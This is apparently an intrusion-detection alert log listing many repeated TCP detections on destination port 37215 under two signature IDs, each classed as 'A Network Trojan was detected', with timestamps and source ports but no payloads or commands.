            Timestamp:05/28/24-09:57:47.469455
            SID:2835222
            Source Port:54460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.027098
            SID:2829579
            Source Port:54472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770866
            SID:2829579
            Source Port:46474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.777162
            SID:2835222
            Source Port:43760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.026389
            SID:2829579
            Source Port:59590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.948090
            SID:2829579
            Source Port:56086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.744373
            SID:2835222
            Source Port:34644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048027
            SID:2829579
            Source Port:42324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.495789
            SID:2829579
            Source Port:39550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.147544
            SID:2835222
            Source Port:34850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.941718
            SID:2829579
            Source Port:34822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.523712
            SID:2835222
            Source Port:41472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.451848
            SID:2829579
            Source Port:46892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.830632
            SID:2835222
            Source Port:41514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.928749
            SID:2829579
            Source Port:46628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.743663
            SID:2829579
            Source Port:47680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.714759
            SID:2835222
            Source Port:60602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.737208
            SID:2835222
            Source Port:39132
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.851036
            SID:2829579
            Source Port:43776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748691
            SID:2829579
            Source Port:34954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.092489
            SID:2829579
            Source Port:54196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326049
            SID:2829579
            Source Port:49776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.845012
            SID:2835222
            Source Port:44340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818488
            SID:2829579
            Source Port:57186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808139
            SID:2829579
            Source Port:38038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.541795
            SID:2835222
            Source Port:46140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.762981
            SID:2829579
            Source Port:47112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.435516
            SID:2835222
            Source Port:43524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.990729
            SID:2829579
            Source Port:36708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848964
            SID:2835222
            Source Port:51770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968475
            SID:2829579
            Source Port:49946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.952559
            SID:2829579
            Source Port:39874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.562875
            SID:2829579
            Source Port:58144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910830
            SID:2829579
            Source Port:60096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.054275
            SID:2835222
            Source Port:52640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854738
            SID:2835222
            Source Port:49230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.803936
            SID:2835222
            Source Port:38392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.892415
            SID:2835222
            Source Port:47324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.307618
            SID:2829579
            Source Port:33666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.483992
            SID:2835222
            Source Port:53574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.843939
            SID:2835222
            Source Port:35448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.833806
            SID:2829579
            Source Port:35968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.524528
            SID:2835222
            Source Port:40798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.853259
            SID:2829579
            Source Port:50404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.058503
            SID:2835222
            Source Port:32912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.885189
            SID:2829579
            Source Port:37604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.309454
            SID:2829579
            Source Port:57818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434397
            SID:2829579
            Source Port:51642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.966699
            SID:2835222
            Source Port:32824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.992518
            SID:2829579
            Source Port:33396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.471531
            SID:2829579
            Source Port:54280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967467
            SID:2829579
            Source Port:53086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.025744
            SID:2829579
            Source Port:58698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.880193
            SID:2835222
            Source Port:56670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.035294
            SID:2835222
            Source Port:48948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.064475
            SID:2835222
            Source Port:39380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.376395
            SID:2829579
            Source Port:32984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811667
            SID:2835222
            Source Port:52830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.327400
            SID:2829579
            Source Port:55626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.892398
            SID:2829579
            Source Port:41380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919050
            SID:2829579
            Source Port:51700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.704949
            SID:2829579
            Source Port:44048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575867
            SID:2829579
            Source Port:34422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.372669
            SID:2835222
            Source Port:39536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.865998
            SID:2829579
            Source Port:53416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.849161
            SID:2829579
            Source Port:52546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.771520
            SID:2829579
            Source Port:40566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853824
            SID:2835222
            Source Port:41794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994764
            SID:2829579
            Source Port:50170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.778770
            SID:2829579
            Source Port:57486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310518
            SID:2829579
            Source Port:47164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.914180
            SID:2829579
            Source Port:52180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.303542
            SID:2835222
            Source Port:58734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.548921
            SID:2835222
            Source Port:39798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.825024
            SID:2829579
            Source Port:53600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.279422
            SID:2835222
            Source Port:37352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.953380
            SID:2835222
            Source Port:35382
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.532913
            SID:2829579
            Source Port:36304
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014558
            SID:2835222
            Source Port:35976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.470349
            SID:2835222
            Source Port:40338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804807
            SID:2829579
            Source Port:41454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:04.899499
            SID:2829579
            Source Port:34464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.432180
            SID:2835222
            Source Port:37946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.768104
            SID:2829579
            Source Port:48576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.739188
            SID:2829579
            Source Port:60098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893882
            SID:2829579
            Source Port:45198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.562949
            SID:2829579
            Source Port:39420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.951195
            SID:2835222
            Source Port:54472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061311
            SID:2829579
            Source Port:38950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.827817
            SID:2835222
            Source Port:55792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850663
            SID:2835222
            Source Port:36996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.931152
            SID:2835222
            Source Port:50740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.524912
            SID:2835222
            Source Port:43178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.880137
            SID:2829579
            Source Port:49164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.317234
            SID:2829579
            Source Port:55858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.564988
            SID:2829579
            Source Port:46754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.312754
            SID:2829579
            Source Port:48594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.564942
            SID:2835222
            Source Port:48160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.952189
            SID:2829579
            Source Port:33100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707600
            SID:2835222
            Source Port:41816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.940978
            SID:2835222
            Source Port:34078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333793
            SID:2835222
            Source Port:51878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.892473
            SID:2829579
            Source Port:50726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.556867
            SID:2835222
            Source Port:55140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.877593
            SID:2835222
            Source Port:52628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.899738
            SID:2829579
            Source Port:47458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020486
            SID:2835222
            Source Port:34240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.581935
            SID:2835222
            Source Port:45414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.812635
            SID:2835222
            Source Port:54568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995958
            SID:2835222
            Source Port:60508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.993353
            SID:2829579
            Source Port:49852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.553018
            SID:2829579
            Source Port:39026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.568259
            SID:2835222
            Source Port:56528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862733
            SID:2829579
            Source Port:41856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754374
            SID:2829579
            Source Port:39298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.052631
            SID:2835222
            Source Port:47348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.334427
            SID:2829579
            Source Port:33316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.850476
            SID:2829579
            Source Port:43148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.377777
            SID:2835222
            Source Port:36622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.821609
            SID:2835222
            Source Port:38102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321431
            SID:2829579
            Source Port:55322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.920118
            SID:2829579
            Source Port:58236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.935116
            SID:2835222
            Source Port:43692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.871368
            SID:2829579
            Source Port:48352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988279
            SID:2829579
            Source Port:37138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.930108
            SID:2835222
            Source Port:56948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.320418
            SID:2835222
            Source Port:57242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.555104
            SID:2829579
            Source Port:48150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809853
            SID:2835222
            Source Port:38430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853805
            SID:2835222
            Source Port:42234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.707072
            SID:2829579
            Source Port:54136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.018684
            SID:2829579
            Source Port:51720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.868193
            SID:2835222
            Source Port:45334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922453
            SID:2835222
            Source Port:43770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754491
            SID:2829579
            Source Port:45226
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956848
            SID:2829579
            Source Port:48954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.315376
            SID:2829579
            Source Port:55324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.374721
            SID:2835222
            Source Port:59890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707620
            SID:2835222
            Source Port:57594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753779
            SID:2835222
            Source Port:32814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.925831
            SID:2835222
            Source Port:51082
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.941002
            SID:2829579
            Source Port:47916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.887181
            SID:2829579
            Source Port:54136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.279734
            SID:2835222
            Source Port:57450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847032
            SID:2829579
            Source Port:39550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.097655
            SID:2835222
            Source Port:57514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.612127
            SID:2835222
            Source Port:57172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.668848
            SID:2835222
            Source Port:37464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.760028
            SID:2829579
            Source Port:45224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.779028
            SID:2829579
            Source Port:39024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.612222
            SID:2835222
            Source Port:44994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.618093
            SID:2829579
            Source Port:40134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.668975
            SID:2829579
            Source Port:53486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922261
            SID:2829579
            Source Port:34676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.866243
            SID:2835222
            Source Port:47278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.001032
            SID:2835222
            Source Port:59326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.545789
            SID:2835222
            Source Port:36846
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309501
            SID:2835222
            Source Port:56728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.747678
            SID:2835222
            Source Port:44022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.065273
            SID:2829579
            Source Port:51988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.406124
            SID:2829579
            Source Port:55418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.063605
            SID:2829579
            Source Port:40426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739137
            SID:2835222
            Source Port:40126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434615
            SID:2829579
            Source Port:55618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.400053
            SID:2829579
            Source Port:47116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.318065
            SID:2829579
            Source Port:60038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.716874
            SID:2835222
            Source Port:35324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.884761
            SID:2829579
            Source Port:45800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.299305
            SID:2835222
            Source Port:60500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.783555
            SID:2829579
            Source Port:42268
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.436572
            SID:2835222
            Source Port:48758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.488897
            SID:2829579
            Source Port:47370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.012483
            SID:2829579
            Source Port:35604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.946906
            SID:2835222
            Source Port:41772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.776528
            SID:2829579
            Source Port:56248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533713
            SID:2835222
            Source Port:37638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.040924
            SID:2835222
            Source Port:33096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.882746
            SID:2829579
            Source Port:56132
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.679740
            SID:2829579
            Source Port:34270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911231
            SID:2829579
            Source Port:47564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014869
            SID:2835222
            Source Port:44422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.561042
            SID:2835222
            Source Port:34452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918162
            SID:2835222
            Source Port:42044
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861137
            SID:2835222
            Source Port:48210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.898394
            SID:2835222
            Source Port:54754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.457526
            SID:2829579
            Source Port:56840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.856362
            SID:2829579
            Source Port:48310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.556323
            SID:2835222
            Source Port:54048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968798
            SID:2829579
            Source Port:41098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770913
            SID:2829579
            Source Port:52546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.842737
            SID:2829579
            Source Port:38116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.334355
            SID:2829579
            Source Port:53202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.894229
            SID:2829579
            Source Port:48408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.846840
            SID:2829579
            Source Port:48224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.450452
            SID:2829579
            Source Port:40710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423238
            SID:2829579
            Source Port:37768
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.610162
            SID:2829579
            Source Port:52038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469759
